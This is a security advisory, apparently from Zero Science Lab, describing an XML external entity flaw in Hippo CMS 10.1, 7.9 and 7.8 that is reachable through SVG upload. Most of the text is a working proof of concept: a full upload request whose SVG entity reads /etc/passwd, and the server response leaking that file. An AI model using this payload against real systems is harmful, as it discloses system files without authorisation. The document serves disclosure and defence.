Hippo CMS 10.1 XML External Entity Information Disclosure

`  
Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability  
  
  
Vendor: Hippo B.V.  
Product web page: http://www.onehippo.org  
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)  
  
Summary: Hippo CMS is an open source Java CMS. We built it so you  
can easily integrate it into your existing architecture.  
  
Desc: XXE (XML External Entity) processing through upload of SVG  
images in the CMS, and through XML import in the CMS Console application.  
  
Tested on: Linux 2.6.32-5-xen-amd64  
Java/1.8.0_66  
Apache-Coyote/1.1  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5301  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php  
  
Vendor: http://www.onehippo.org/security-issues-list/security-12.html  
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html  
  
  
04.12.2015  
  
---  
  
  
[Request]:  
  
  
POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1  
Host: 10.0.2.17  
User-Agent: ZSL_Web_Scanner/2.8  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg  
Content-Length: 2101  
Content-Type: multipart/form-data; boundary=---------------------------20443294602274  
Cookie: [OMMITED]  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
-----------------------------20443294602274  
Content-Disposition: form-data; name="id1a0_hf_0"  
  
  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item  
:view:1:item:value:widget"  
  
  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item  
:view:1:item:view:1:item:view:1:item:value:widget"  
  
  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item  
:view:1:item:view:2:item:view:1:item:value:widget"  
  
  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left  
:view:1:item:view:1:item:value:widget"  
  
asd  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left  
:view:2:item:view:1:item:value:widget"  
  
hhh  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left  
:view:3:item:view:1:item:panel:editor"  
  
  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right  
:view:2:item:view:1:item:value:widget"  
  
hhh  
-----------------------------20443294602274  
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right  
:view:3:item:view:1:item:value:widget"  
  
hhhh  
-----------------------------20443294602274  
Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]  
><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999  
/xlink" version="1.1">&xxe;</svg>  
-----------------------------20443294602274--  
  
  
  
[Response]:  
  
  
<?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www  
.w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98">  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
***  
***  
***  
***  
</svg>  
`